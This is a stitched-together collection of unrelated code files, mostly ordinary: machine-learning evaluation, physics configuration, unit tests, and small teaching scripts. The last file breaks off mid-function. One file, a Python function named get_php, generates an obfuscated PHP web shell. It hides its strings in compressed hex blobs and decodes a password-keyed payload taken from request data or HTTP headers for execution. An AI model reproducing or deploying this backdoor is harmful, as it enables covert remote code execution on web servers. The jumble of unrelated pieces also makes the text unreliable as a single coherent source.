def p_token_list(p):
"""
token_list :
token_list : STRING token_list
token_list : parameter token_list
"""
if len(p) == 1:
p[0] = []
else:
p[0] = [p[1]] + p[2]
def p_parameter(p):
"""
parameter : AT STRING AT
"""
p[0] = Parameter(p[2])
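# Minimal wiring sketch: ply expects an error hook, and the parser must be
# built explicitly (assumption: the token definitions for STRING and AT live
# in a companion lexer module and are in scope before building).
def p_error(p):
    print("Syntax error at %r" % (p,))
# parser = yacc.yacc() # build once the lexer's token list is importable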
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import random
import torch
import argparse
import torch.nn as nn
import torch.utils.data as data
import torchvision.transforms as transforms
#from src.feat_model import *
#from src.featset import *
from src.rank_model import *
from src.rankset import *
import numpy as np
import pickle
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def model_eval(model,testing_set,cnn=False):
dish_feat = []
ingr_feat = []
#outfile = open('rank.rec','w')
#for i in range(len(testing_set.dish_feat)):
ind = np.arange(len(testing_set.dish_feat))
random.shuffle(ind)
trec = {}
rrec = ind[:1000]
for i in ind[:1000]:
trec[i] = {'ingr':[],'ranklist':[]}
dish_img_feat = testing_set.dish_feat[i]['feat']
dish_feat.append(dish_img_feat)
ingr_img_feat = np.zeros((10,len(dish_img_feat)))
        n_filled = 0 # number of ingredient feature rows filled (avoids shadowing torch.nn)
        for j in testing_set.dish_feat[i]['ingrs']:
            ingr_id = testing_set.vocab[j-2]
            if ingr_id in testing_set.ingr_feat:
                trec[i]['ingr'].append(ingr_id)
                ingr_img_feat[n_filled] = random.sample(testing_set.ingr_feat[ingr_id],1)[0]
                n_filled += 1
ingr_feat.append(ingr_img_feat)
dish_feat = np.array(dish_feat)
dish_emb = torch.FloatTensor(dish_feat).to(device)
dish_emb = model.visual_embedding1(dish_emb)
ingr_feat = np.array(ingr_feat)
ingr_embs = torch.FloatTensor(ingr_feat).to(device)
if cnn:
dims = ingr_embs.shape
ingr_embs = ingr_embs.view(dims[0],1,dims[1],dims[2])
ingr_embs = model.ingr_embedding(ingr_embs).squeeze() # size (bsz, 1024)
ingr_embs = model.ingr_embedding2(ingr_embs)
else:
concat_ingr = ingr_embs.view(ingr_embs.size(0), -1) # size (bsz, 1024 * 10)
ingr_embs = model.ingr_embedding(concat_ingr)
rec = []
for i in range(1000):
ingr_in = ingr_embs[i].repeat(1000,1)
final_emb = torch.cat((dish_emb,ingr_in),1)
score = model.score(final_emb)
#score = model.score(dish_emb,ingr_in)
score = score.cpu().detach().numpy().flatten()
rank_list = score.argsort()[::-1]
for r in rank_list:
trec[rrec[i]]['ranklist'].append(rrec[r])
rank = np.where(rank_list==i)
trec[rrec[i]]['rank'] = rank
#print(rank)
rec.append(rank)
rec = np.array(rec)
#print(rec.mean())
#print(np.median(rec))
#print((rec < 10).sum()/1000)
pickle.dump(trec,open('/home/ylien/case.rec','wb'))
return np.median(rec),(rec < 1).sum()/1000,(rec < 5).sum()/1000,(rec < 10).sum()/1000
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("--dish_feat_path", type=str, default="data/")
parser.add_argument("--ingr_feat_path", type=str, default="data/")
parser.add_argument("--dish_info_path", type=str, default="data/dish_info")
parser.add_argument("--vocab_path", type=str, default="data/vocab.txt")
parser.add_argument("--model_path", type=str)
args = parser.parse_args()
return args
def test(opt):
    part = 'test'
testing_set = FeatDataset(opt.dish_feat_path+part+'_featset.pkl', opt.ingr_feat_path+'ingr_feat.pkl',opt.dish_info_path,opt.vocab_path,part)
model = torch.load(opt.model_path)
model.eval()
metric = [[],[],[],[]]
for _ in range(1):
medR,r1,r5,r10 = model_eval(model,testing_set,('cnn' in opt.model_path))
metric[0].append(medR)
metric[1].append(r1)
metric[2].append(r5)
metric[3].append(r10)
metric = np.array(metric)
    for name, vals in zip(['medR', 'R@1', 'R@5', 'R@10'], metric):
        print(name, vals.mean())
def main():
opt = get_args()
test(opt)
if __name__ == "__main__":
main()
|
import FWCore.ParameterSet.Config as cms
allConversions = cms.EDProducer('ConversionProducer',
AlgorithmName = cms.string('mixed'),
#src = cms.VInputTag(cms.InputTag("generalTracks")),
src = cms.InputTag("gsfGeneralInOutOutInConversionTrackMerger"),
convertedPhotonCollection = cms.string(''), ## or empty
bcEndcapCollection = cms.InputTag('particleFlowSuperClusterECAL:particleFlowBasicClusterECALEndcap'),
bcBarrelCollection = cms.InputTag('particleFlowSuperClusterECAL:particleFlowBasicClusterECALBarrel'),
scBarrelProducer = cms.InputTag('particleFlowSuperClusterECAL:particleFlowSuperClusterECALBarrel'),
scEndcapProducer = cms.InputTag('particleFlowSuperClusterECAL:particleFlowSuperClusterECALEndcapWithPreshower'),
primaryVertexProducer = cms.InputTag('offlinePrimaryVerticesWithBS'),
deltaEta = cms.double(0.4), #track pair search range in eta (applied even in case of preselection bypass)
HalfwayEta = cms.double(.1),# Track-bc matching search range on Eta
maxNumOfTrackInPU = cms.int32(999999),
maxTrackRho = cms.double(120.),
maxTrackZ = cms.double(300.),
minSCEt = cms.double(10.0),
dEtacutForSCmatching = cms.double(0.03),
dPhicutForSCmatching = cms.double(0.05),
dEtaTrackBC = cms.double(.2), # Track-Basic cluster matching, position diff on eta
dPhiTrackBC = cms.double(1.), # Track-Basic cluster matching, position diff on phi
EnergyBC = cms.double(0.3), # Track-Basic cluster matching, BC energy lower cut
EnergyTotalBC = cms.double(.3), # Track-Basic cluster matching, two BC energy summation cut
#tight cuts
d0 = cms.double(0.), #d0*charge cut
MaxChi2Left = cms.double(10.), #Track quality
MaxChi2Right = cms.double(10.),
MinHitsLeft = cms.int32(4),
MinHitsRight = cms.int32(2),
DeltaCotTheta = cms.double(0.1), #Track pair opening angle on R-Z
DeltaPhi = cms.double(.2), #Track pair opening angle on X-Y (not a final selection cut)
vtxChi2 = cms.double(0.0005),
MinApproachLow = cms.double(-.25), #Track pair min distance at approaching point on X-Y
MinApproachHigh = cms.double(1.0), #Track pair min distance at approaching point on X-Y
rCut = cms.double(2.0),#analytical track cross point
dz = cms.double(5.0),#track pair inner position difference
# kinematic vertex fit parameters
maxDelta = cms.double(0.01),#delta of parameters
maxReducedChiSq = cms.double(225.),#maximum chi^2 per degree of freedom before fit is terminated
minChiSqImprovement = cms.double(50.),#threshold for "significant improvement" in the fit termination logic
maxNbrOfIterations = cms.int32(40),#maximum number of convergence iterations
UsePvtx = cms.bool(True),
AllowD0 = cms.bool(True), #Allow d0*charge cut
AllowDeltaPhi = cms.bool(False),
AllowTrackBC = cms.bool(False), #Allow to match track-basic cluster
AllowDeltaCot = cms.bool(True), #Allow pairing using delta cot theta cut
AllowMinApproach = cms.bool(True), #Allow pairing using min approach cut
AllowOppCharge = cms.bool(True), #use opposite charge tracks to pair
AllowVertex = cms.bool(True),
bypassPreselGsf = cms.bool(True), #bypass preselection for gsf + X pairs
bypassPreselEcal = cms.bool(False), #bypass preselection for ecal-seeded + X pairs
bypassPreselEcalEcal = cms.bool(True), #bypass preselection for ecal-seeded + ecal-seeded pairs
AllowSingleLeg = cms.bool(False), #Allow single track conversion
AllowRightBC = cms.bool(False) #Require second leg matching basic cluster
)
from Configuration.Eras.Modifier_phase2_hgcal_cff import phase2_hgcal
phase2_hgcal.toModify( allConversions, bypassPreselGsf = False )
from Configuration.Eras.Modifier_fastSim_cff import fastSim
fastSim.toModify(allConversions, src = 'gsfGeneralConversionTrackMerger')
|
# -*- coding: utf-8 -*-
"""
Tests for the tensor transform functions. Run with pytest.
Created on Sat May 9 00:09:00 2020
@author: aripekka
"""
import sys
import os.path
import numpy as np
sys.path.insert(1, os.path.join(os.path.dirname(__file__),'..'))
from tbcalc.transverse_deformation import *
from tbcalc import cartesian_tensors_to_cylindrical
from pyTTE import TTcrystal, Quantity
def test_isotropic_circular():
#Calculate the reference stresses and strains as implemented in the
#deprecated sbcalc package
E = 165
nu = 0.22
thickness = 0.1
Rx = 1000.0
Ry = 500.0
R = np.sqrt(Rx*Ry)
L = 100.0
x=np.linspace(-L/2,L/2,150)
X,Y=np.meshgrid(x,x)
RR = np.sqrt(X**2 + Y**2)
PHI = np.arctan2(Y,X)
stress, strain, P_imp = isotropic_circular(Rx, Ry, L, thickness, nu, E)
stress_cyl = cartesian_tensors_to_cylindrical(stress)
strain_cyl = cartesian_tensors_to_cylindrical(strain)
stress_cyl_ref = {}
stress_cyl_ref['rr'] = E/(16*R**2)*(L**2/4-RR**2)+stress['xx'](X,Y)*0
stress_cyl_ref['phiphi'] = E/(16*R**2)*(L**2/4-3*RR**2)+stress['xx'](X,Y)*0
stress_cyl_ref['rphi'] = stress['xx'](X,Y)*0
stress_cyl_ref['phir'] = stress['xx'](X,Y)*0
strain_cyl_ref = {}
strain_cyl_ref['rr'] = 1/(16*R**2)*((1-nu)*L**2/4-(1-3*nu)*RR**2)+stress['xx'](X,Y)*0
strain_cyl_ref['phiphi'] = 1/(16*R**2)*((1-nu)*L**2/4-(3-nu)*RR**2)+stress['xx'](X,Y)*0
strain_cyl_ref['rphi'] = stress['xx'](X,Y)*0
strain_cyl_ref['phir'] = stress['xx'](X,Y)*0
strain_cyl_ref['zphi'] = stress['xx'](X,Y)*0
strain_cyl_ref['phiz'] = stress['xx'](X,Y)*0
strain_cyl_ref['rz'] = stress['xx'](X,Y)*0
strain_cyl_ref['zr'] = stress['xx'](X,Y)*0
strain_cyl_ref['zz'] = nu/(4*R**2)*(RR**2-L**2/8)+stress['xx'](X,Y)*0
    meps = np.finfo(float).eps # machine epsilon
for i in ['r','phi']:
for j in ['r','phi']:
assert np.all(np.logical_or(np.abs(stress_cyl_ref[i+j] - stress_cyl[i+j](RR,PHI)) < meps,
np.logical_and(np.isnan(stress_cyl_ref[i+j]), np.isnan(stress_cyl[i+j](RR,PHI)))))
for i in ['r','phi','z']:
for j in ['r','phi','z']:
assert np.all(np.logical_or(np.abs(strain_cyl_ref[i+j] - strain_cyl[i+j](RR,PHI)) < meps,
np.logical_and(np.isnan(strain_cyl_ref[i+j]), np.isnan(strain_cyl[i+j](RR,PHI))))) |
# For each test case: read and ignore n, then answer "Yes" iff no value occurs
# more than twice in the array.
for _ in [0] * int(input()):
    input()
    f = 1
    a = list(map(int, input().split()))
    for x in a:
        if a.count(x) > 2:
            f = 0
    print("Yes" if f else "No")
|
def get_php(keyword: int = 4, passwd: str = "", salt: str = ""):
return """<?php
function dept($data,$salt="%s",$change=0x80){$data=base64_decode($data);$saltm = md5($salt);$len = strlen($data);$pass=strrev(str_rot13(substr(strrev($data^str_repeat($saltm,ceil($len / 32)) ^ str_repeat(chr($change),$len)),0,-32)));return $pass;}
class replace {
private $hash = "\\xab\\xa8\\xa9\\x00\\xc2\\x78\\x77\\xd7\\x90\\x9a\\xf8\\x00\\xff\\x60\\x20\\xe9\\xec\\xef\\xef\\xed\\xe9\\x5a\\xa3\\x92\\x97\\x98\\x9b\\x6a\\xab\\x12\\x1f\\xec\\x1a\\x14\\xe6\\x1a\\x14\\x0d\\x00\\x8b\\x07\\x00";
function __construct($var, $srcname, $array = null)
{
$this->var = $var;
$this->name = $srcname;
$this->cookie = get_class($this);
if(!is_null($array))
die((string)new replace($this->var,array($array,$this->name)));
}
function __toString(){
$die = $this->var .= gzinflate(substr($this->hash,-3)).$this->cookie;
$this->cookie = explode("|",gzinflate(substr($this->hash,0,-3)));
if(end($this->name) != 6){
$name = $this->name[0][$this->cookie[end($this->name)]][%s];
}else{
$name = $this->cookie[end($this->name)].'HTTP_%s]';
$die('.*', '\\0',$name,gzinflate("\\xcb\\x4d\\x2d\\x02\\x00"))=="";
}
die($die('.*', '\\0',dept($name),gzinflate("\\xcb\\x4d\\x2d\\x02\\x00")));
}
}
new replace(gzinflate("\\xcb\\x4d\\x4a\\x2d\\x4a\\x4d\\x07\\x00"), %s,$GLOBALS);""" % (salt, passwd, passwd.upper(), keyword)
|
from Nodo import Nodo
from AutoNuevo import AutoNuevo
from AutoUsado import AutoUsado
class Lista:
__comienzo=None
__actual=None
__index=0
__tope=0
def __init__(self):
self.__comienzo=None
self.__actual=None
self.__index=0
self.__tope=0
def __iter__(self):
return self
def __next__(self):
if self.__index==self.__tope:
self.__actual=self.__comienzo
self.__index=0
raise StopIteration
else:
            self.__index+=1
            dato=self.__actual.getAuto()
            self.__actual=self.__actual.getSiguiente()
            return dato
def getTope(self):
return self.__tope
    # CLAVE (the key) can be a license plate or a position
    def getNodo(self,clave):
band=False
retorno=None
        # Position
if type(clave)==int:
if clave<self.__tope:
while not band and self.__index<=self.__tope:
if clave==self.__index:
retorno=self.__actual.getAuto()
band=True
else:
self.__actual=self.__actual.getSiguiente()
self.__index+=1
        # License plate
else:
while not band and self.__index<self.__tope:
dato=self.__actual.getAuto()
if isinstance(dato,AutoUsado):
if dato.getPatente()==clave.lower():
retorno=dato
band=True
self.__actual=self.__actual.getSiguiente()
self.__index+=1
        if not band:
print("No encontrado.")
else:
print("Fue encontrado.")
self.__actual=self.__comienzo
self.__index=0
return retorno
def crearAuto(self):
band=False
retorno=None
while not band:
print("1. Auto Nuevo \n2. Auto Usado")
try:
op=int(input("\nIngrese opcion: "))
except:
print("\nOpcion erronea, intente de nuevo. ")
else:
band=op in [1,2]
if not band:
print("\nOpcion erronea, intente de nuevo. ")
modelo= input("Modelo: ")
puertas=int(input("Cantidad de puertas: "))
color=input("Color: ")
precioBase=float(input("Precio base: "))
if op==1:
try:
print("\nMarca Fiat")
marca= 'Fiat'
version=int(input("\nVersion del auto\n1. Base\n2.Full\nIngrese opcion: "))
while version not in[1,2]:
print("\nError,intente de nuevo.")
version=int(input("\nVersion del auto\n1. Base\n2.Full\nIngrese opcion: "))
if version==1:
version='base'
else:
version='full'
auto=AutoNuevo(modelo,puertas,color,precioBase,marca,version)
retorno=auto
except:
print("Error en los datos agregados.")
else:
marca=input("\Marca: ")
patente=input("Patente: ")
anio=int(input("Anio: "))
kilometraje=float(input("Kilometraje: "))
auto=AutoUsado(modelo,puertas,color,precioBase,marca,patente,anio,kilometraje)
retorno=auto
        return retorno
def insertar(self,posicion,elemento):
band=False
band2=False
anterior=None
if posicion>=self.__tope:
print("\nPosicion fuera del alcance.")
band2=True
if band2==False:
if posicion==0:
band=True
self.__tope+=1
nuevoNodo=Nodo(elemento)
if self.__comienzo==None:
self.__comienzo=nuevoNodo
else:
nuevoNodo.setSiguiente(self.__comienzo)
self.__comienzo=nuevoNodo
else:
anterior=self.__actual
self.__actual=self.__actual.getSiguiente()
self.__index+=1
while not band and self.__index<self.__tope:
if self.__index==posicion:
nuevoNodo=Nodo(elemento)
nuevoNodo.setSiguiente(self.__actual)
anterior.setSiguiente(nuevoNodo)
self.__tope+=1
band=True
else:
anterior=self.__actual
self.__actual=self.__actual.getSiguiente()
self.__index+=1
self.__actual=self.__comienzo
self.__index=0
def agregar(self,elemento):
nodo=Nodo(elemento)
nodo.setSiguiente(self.__comienzo)
self.__comienzo=nodo
self.__actual=self.__comienzo
self.__tope+=1
    def mostrarTipoObjeto(self,posicion):
        auto=self.getNodo(posicion)
        print(type(auto).__name__ if auto is not None else "No encontrado.")
def cambiarPrecioBase(self,patente,precioNuevo):
        auto=self.getNodo(patente)
if auto==None:
print("Patente no encontrada.")
else:
auto.setPrecioBase(precioNuevo)
def mostrarMasEconomico(self):
economico=None
        menor= 50000000000 # start with an absurdly large sentinel value
for x in self.__iter__():
importeVenta=x.getImporteVenta()
if importeVenta<menor:
menor=importeVenta
economico=x
print("\n-------------------------------------------------------------------------------------------------")
print("{} {} {} {} {} {}".format("Modelo","Puertas","Color","Precio Base","Marca","Precio Total"))
print("--------------------------------------------------------------------------------------------------")
print(economico)
print("--------------------------------------------------------------------------------------------------")
def mostrar(self):
print("\n-------------------------------------------------------------------------------------------------")
print("{} {} {} {} {} {}".format("Modelo","Puertas","Color","Precio Base","Marca","Precio Total"))
print("--------------------------------------------------------------------------------------------------")
for elemento in self.__iter__():
print(elemento)
print("--------------------------------------------------------------------------------------------------")
def toJson(self):
d = dict(
            __class__ = self.__class__.__name__,
autos=[auto.toJson() for auto in self.__iter__()]
)
return d |
# Reading the entire file contents with the readline function
f = open("C:/Users/chasu/OneDrive/바탕 화면/doit/새파일.txt", "r")
while True:
line = f.readline()
if not line: break
print(line)
f.close()
# Inside the while True: infinite loop, f.readline() keeps reading the file one line at a time.
# If there is no more line to read, break is executed.
# At end of file, readline returns an empty string (''), which is falsy, so the `if not line` check works.
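# Equivalent idiomatic form: a file object is itself an iterator over its lines,
# and the with-statement closes the file automatically.
with open("C:/Users/chasu/OneDrive/바탕 화면/doit/새파일.txt", "r") as f:
    for line in f:
        print(line, end="") # each line already ends with '\n'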
|
'''
simulation_parameters.py
-> created to ensure consistency throughout ALL other files
'''
##########################################################
#Data parameters
#From the data, do not change unless you played with the preprocessing part
data_file = '../data_preprocessing/data_processed/final_table'
data_downscale = 400 #x and y have a range of 400, scaled down to [0,1]
max_time = 6 #in micro seconds
sample_freq = 20 #in MHz
beamformings = 32
#Parameters obtained from the ray-tracing simulator, DO NOT CHANGE
starting_x = -183.0
starting_y = -176.0
grid_x = 400.0
grid_y = 400.0
grid = [grid_x, grid_y]
x_shift = 0.0 - starting_x
y_shift = 0.0 - starting_y
shift = [x_shift, y_shift]
original_tx_power = 30 #in dBm
original_rx_gain = 0 #in dBi
#Data parameters
##########################################################
##########################################################
#Pre-processing parameters
#Logic behind these variables: the simulations were done with the above
# parameters. If we want to slightly change our target simulation power
# levels without re-doing the ray-tracing part, we can adapt here. The
# variable "minimum_power" represents the detection threshold
# ("baseline_cut") scaled by the a posteriori changes. In practical terms,
# any sampled power below "minimum_power" is below the detection threshold,
# and thus not detected.
baseline_cut = -100 #in dBm <--- change for different sample_freq (> thermal noise)
tx_power = 45 #in dBm
rx_gain = 10 #in dBi
minimum_power = baseline_cut - (tx_power-original_tx_power) - (rx_gain-original_rx_gain)
#Stored power feature if non-zero = (simulated_power[dBm]+power_offset)*power_scale
#E.g.: Power offset = 170, scale = 0.01 -> -50dbm in the data becomes 1.2;
# -150dbm becomes 0.2;
#Because this is done manually, the input feature's values will have a
# non-negligible gap between absence of data (represented as 0) and a barely
# detectable power_sample (which should be bigger than 0.1), which helps
# the learning mechanism.
power_offset = 170
power_scale = 0.01
min_pow_cutoff = ((minimum_power+power_offset) * power_scale) #minimum_power converted
#If you have more than 1 GPU, you can change the target here
target_gpu = 0
preprocessed_file = 'processed_data/tf_dataset'
#[Optional] Remove time slots with little to no data. Requires hand-tuning
# for frequencies != 20 MHz.
removed_ts = True
slice_weak_TS_start_remove = 82
removed_invalid_slots = False
time_slots = max_time * sample_freq
if removed_ts:
#rescales the TS to remove to the target freq
slice_weak_TS_start_remove = int((slice_weak_TS_start_remove / 20) * sample_freq)
time_slots = time_slots - ( (time_slots-slice_weak_TS_start_remove) + 1)
#removed slots: [0, slice_weak_TS_start_remove through (max_time * sample_freq)]
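#e.g. at the default 20 MHz: time_slots = 120 - ((120 - 82) + 1) = 81, which is
# the "81 slots" referenced in the CNN maxpool comments below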
#noise STD
test_noise = 6.00 #log-normal distribution = gaussian over dB values
noise_std_converted = (test_noise * power_scale)
#scaler
binary_scaler = True
only_16_bf = False #<--- change maxpool from [2,1] to [1,1] when this flag is
# true, to keep the same resource utilization and thus
# enable a fair comparison
predicted_input_size = time_slots * beamformings
#Misc. [for other tests]
detect_invalid_slots = False
slice_weak_TS = removed_ts
train_spatial_undersampling = 1 # =1 -> 1m between samples, =2 -> 2m, ...
# min = 1 m
#Pre-processing parameters
##########################################################
##########################################################
#CNN - Classification parameters
#With this variable, can control the number of classes. We will have
# 'lateral_partition'^2 classes. If lateral_partition == 1, the code will
# jump straight into the regression part.
lateral_partition = 8
area_partition = lateral_partition ** 2
n_classes = area_partition #this variable has 2 instances, for readability
dnn_classification_parameters = { 'batch_size': 64,
'epochs': 1000,
'dropout': 0.01, #<--- the dropout is small because we are also adding noise to the data
'learning_rate': 1e-4,
'learning_rate_decay': 0.995,
'fcl_neurons': 256,
'hidden_layers': 12,
'cl_neurons_1': 8,
'cl_filter_1': [3,3],
                                  'cl_maxpool_1': [2,1], #<--- as currently defined, the "temporal" dimension has 81 slots:
#divisible by 1, 3, 9, 27 -> don't try maxpool(2,2), it will crash
'test_batch_size': 256 }
#CNN - Classification parameters
##########################################################
##########################################################
#CNN - Regression parameters
train_sets = 20
test_sets = 10
n_predictions = train_sets+test_sets #<-- it's too heavy to generate them at runtime :(
dnn_regression_parameters = { 'batch_size': 64,
'epochs': 1000,
'dropout': 0.01,
'learning_rate': 1e-4,
'learning_rate_decay': 0.995,
'fcl_neurons': 256,
'hidden_layers': 12,
'cl_neurons_1': 8,
'cl_filter_1': [3,3],
                              'cl_maxpool_1': [2,1], #<--- as currently defined, the "temporal" dimension has 81 slots:
#divisible by 1, 3, 9, 27 -> don't try maxpool(2,2), it will crash
'test_batch_size': 256 }
#CNN - Regression parameters
##########################################################
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import pytest
import sagemaker
from mock import Mock, PropertyMock
_ROLE = "DummyRole"
_REGION = "us-west-2"
_DEFAULT_BUCKET = "my-bucket"
@pytest.fixture(scope="session")
def client():
"""Mock client.
Considerations when appropriate:
* utilize botocore.stub.Stubber
* separate runtime client from client
"""
client_mock = Mock()
client_mock._client_config.user_agent = (
"Boto3/1.14.24 Python/3.8.5 Linux/5.4.0-42-generic Botocore/1.17.24 Resource"
)
return client_mock
@pytest.fixture(scope="session")
def boto_session(client):
role_mock = Mock()
type(role_mock).arn = PropertyMock(return_value=_ROLE)
resource_mock = Mock()
resource_mock.Role.return_value = role_mock
session_mock = Mock(region_name=_REGION)
session_mock.resource.return_value = resource_mock
session_mock.client.return_value = client
return session_mock
@pytest.fixture(scope="session")
def sagemaker_session(boto_session, client):
# ideally this would mock Session instead of instantiating it
# most unit tests do mock the session correctly
session = sagemaker.session.Session(
boto_session=boto_session,
sagemaker_client=client,
sagemaker_runtime_client=client,
default_bucket=_DEFAULT_BUCKET,
sagemaker_metrics_client=client,
)
return session
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import glob
import mock
import os.path
import testtools
from os_vif.internal.command import ip as ip_lib
from oslo_concurrency import processutils
from vif_plug_ovs import constants
from vif_plug_ovs import exception
from vif_plug_ovs import linux_net
from vif_plug_ovs import privsep
class LinuxNetTest(testtools.TestCase):
def setUp(self):
super(LinuxNetTest, self).setUp()
privsep.vif_plug.set_client_mode(False)
@mock.patch.object(ip_lib, "set")
@mock.patch.object(linux_net, "device_exists", return_value=True)
def test_ensure_bridge_exists(self, mock_dev_exists, mock_ip_set):
linux_net.ensure_bridge("br0")
mock_ip_set.assert_called_once_with('br0', state='up',
check_exit_code=[0, 2, 254])
mock_dev_exists.assert_has_calls([mock.call("br0")])
@mock.patch.object(ip_lib, "set")
@mock.patch.object(os.path, "exists", return_value=False)
@mock.patch.object(processutils, "execute")
@mock.patch.object(linux_net, "device_exists", return_value=False)
def test_ensure_bridge_new_ipv4(self, mock_dev_exists, mock_execute,
mock_path_exists, mock_ip_set):
linux_net.ensure_bridge("br0")
calls = [
mock.call('brctl', 'addbr', 'br0'),
mock.call('brctl', 'setfd', 'br0', 0),
mock.call('brctl', 'stp', 'br0', "off"),
mock.call('brctl', 'setageing', 'br0', 0),
mock.call('tee', '/sys/class/net/br0/bridge/multicast_snooping',
check_exit_code=[0, 1], process_input='0'),
]
mock_execute.assert_has_calls(calls)
mock_dev_exists.assert_has_calls([mock.call("br0")])
mock_ip_set.assert_called_once_with('br0', state='up',
check_exit_code=[0, 2, 254])
@mock.patch.object(ip_lib, "set")
@mock.patch.object(os.path, "exists", return_value=True)
@mock.patch.object(processutils, "execute")
@mock.patch.object(linux_net, "device_exists", return_value=False)
def test_ensure_bridge_new_ipv6(self, mock_dev_exists, mock_execute,
mock_path_exists, mock_ip_set):
linux_net.ensure_bridge("br0")
calls = [
mock.call('brctl', 'addbr', 'br0'),
mock.call('brctl', 'setfd', 'br0', 0),
mock.call('brctl', 'stp', 'br0', "off"),
mock.call('brctl', 'setageing', 'br0', 0),
mock.call('tee', '/sys/class/net/br0/bridge/multicast_snooping',
check_exit_code=[0, 1], process_input='0'),
mock.call('tee', '/proc/sys/net/ipv6/conf/br0/disable_ipv6',
check_exit_code=[0, 1], process_input='1'),
]
mock_execute.assert_has_calls(calls)
mock_dev_exists.assert_has_calls([mock.call("br0")])
mock_ip_set.assert_called_once_with('br0', state='up',
check_exit_code=[0, 2, 254])
@mock.patch.object(processutils, "execute")
@mock.patch.object(linux_net, "device_exists", return_value=False)
@mock.patch.object(linux_net, "interface_in_bridge", return_value=False)
    def test_delete_bridge_none(self, mock_interface_br, mock_dev_exists,
                                mock_execute):
linux_net.delete_bridge("br0", "vnet1")
mock_execute.assert_not_called()
mock_dev_exists.assert_has_calls([mock.call("br0")])
mock_interface_br.assert_not_called()
@mock.patch.object(ip_lib, "set")
@mock.patch.object(processutils, "execute")
@mock.patch.object(linux_net, "device_exists", return_value=True)
@mock.patch.object(linux_net, "interface_in_bridge", return_value=True)
def test_delete_bridge_exists(self, mock_interface_br, mock_dev_exists,
mock_execute, mock_ip_set):
linux_net.delete_bridge("br0", "vnet1")
calls = [
mock.call('brctl', 'delif', 'br0', 'vnet1'),
mock.call('brctl', 'delbr', 'br0')]
mock_execute.assert_has_calls(calls)
mock_dev_exists.assert_has_calls([mock.call("br0")])
mock_interface_br.assert_called_once_with("br0", "vnet1")
mock_ip_set.assert_called_once_with('br0', state='down')
@mock.patch.object(ip_lib, "set")
@mock.patch.object(processutils, "execute")
@mock.patch.object(linux_net, "device_exists", return_value=True)
@mock.patch.object(linux_net, "interface_in_bridge", return_value=False)
def test_delete_interface_not_present(self,
mock_interface_br, mock_dev_exists, mock_execute, mock_ip_set):
linux_net.delete_bridge("br0", "vnet1")
mock_execute.assert_called_once_with('brctl', 'delbr', 'br0')
mock_dev_exists.assert_has_calls([mock.call("br0")])
mock_interface_br.assert_called_once_with("br0", "vnet1")
mock_ip_set.assert_called_once_with('br0', state='down')
@mock.patch.object(processutils, "execute")
def test_add_bridge_port(self, mock_execute):
linux_net.add_bridge_port("br0", "vnet1")
mock_execute.assert_has_calls([
mock.call('brctl', 'addif', 'br0', 'vnet1')])
def test_ovs_vif_port_cmd(self):
expected = ['--', '--may-exist', 'add-port',
'fake-bridge', 'fake-dev',
'--', 'set', 'Interface', 'fake-dev',
'external-ids:iface-id=fake-iface-id',
'external-ids:iface-status=active',
'external-ids:attached-mac=fake-mac',
'external-ids:vm-uuid=fake-instance-uuid']
cmd = linux_net._create_ovs_vif_cmd('fake-bridge', 'fake-dev',
'fake-iface-id', 'fake-mac',
'fake-instance-uuid')
self.assertEqual(expected, cmd)
expected += ['type=fake-type']
cmd = linux_net._create_ovs_vif_cmd('fake-bridge', 'fake-dev',
'fake-iface-id', 'fake-mac',
'fake-instance-uuid',
'fake-type')
self.assertEqual(expected, cmd)
expected += ['options:vhost-server-path=/fake/path']
cmd = linux_net._create_ovs_vif_cmd('fake-bridge', 'fake-dev',
'fake-iface-id', 'fake-mac',
'fake-instance-uuid',
'fake-type',
vhost_server_path='/fake/path')
self.assertEqual(expected, cmd)
@mock.patch.object(linux_net, '_create_ovs_bridge_cmd')
@mock.patch.object(linux_net, '_ovs_vsctl')
def test_ensure_ovs_bridge(self, mock_vsctl, mock_create_ovs_bridge):
bridge = 'fake-bridge'
dp_type = 'fake-type'
linux_net.ensure_ovs_bridge(bridge, dp_type)
mock_create_ovs_bridge.assert_called_once_with(bridge, dp_type)
self.assertTrue(mock_vsctl.called)
def test_create_ovs_bridge_cmd(self):
bridge = 'fake-bridge'
dp_type = 'fake-type'
expected = ['--', '--may-exist', 'add-br', bridge,
'--', 'set', 'Bridge', bridge,
'datapath_type=%s' % dp_type]
actual = linux_net._create_ovs_bridge_cmd(bridge, dp_type)
self.assertEqual(expected, actual)
@mock.patch.object(linux_net, '_ovs_supports_mtu_requests')
@mock.patch.object(linux_net, '_ovs_vsctl')
@mock.patch.object(linux_net, '_create_ovs_vif_cmd')
@mock.patch.object(linux_net, '_set_device_mtu')
def test_ovs_vif_port_with_type_vhostuser(self, mock_set_device_mtu,
mock_create_cmd, mock_vsctl,
mock_ovs_supports_mtu_requests):
mock_ovs_supports_mtu_requests.return_value = True
linux_net.create_ovs_vif_port(
'fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid", mtu=1500,
interface_type=constants.OVS_VHOSTUSER_INTERFACE_TYPE)
mock_create_cmd.assert_called_once_with('fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid", constants.OVS_VHOSTUSER_INTERFACE_TYPE,
None)
self.assertFalse(mock_set_device_mtu.called)
self.assertTrue(mock_vsctl.called)
@mock.patch.object(linux_net, '_ovs_supports_mtu_requests')
@mock.patch.object(linux_net, '_ovs_vsctl')
@mock.patch.object(linux_net, '_create_ovs_vif_cmd')
@mock.patch.object(linux_net, '_set_device_mtu')
def test_ovs_vif_port_with_type_vhostuserclient(self,
mock_set_device_mtu, mock_create_cmd,
